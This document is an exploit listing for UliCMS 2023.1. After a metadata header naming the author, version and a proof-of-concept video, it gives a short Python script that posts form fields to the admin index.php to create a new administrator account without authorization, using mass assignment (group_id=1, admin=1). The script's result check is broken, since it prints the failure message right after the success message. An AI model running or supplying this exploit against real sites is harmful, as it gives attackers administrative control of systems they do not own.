Ulicms 2023.1 Exploit, create admin user via mass assignment

#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs:   create admin user via mass assignment
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna

import requests

new_name=input("name: ")
new_email=input("email: ")
new_pass=input("password: ")

url = "http://localhost/dist/admin/index.php"

headers = {"Content-Type": "application/x-www-form-urlencoded"}

data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Request is success and created new admin account")

    print("Request is failure.!!")

#POC video : https://youtu.be/SCkRJzJ0FVk

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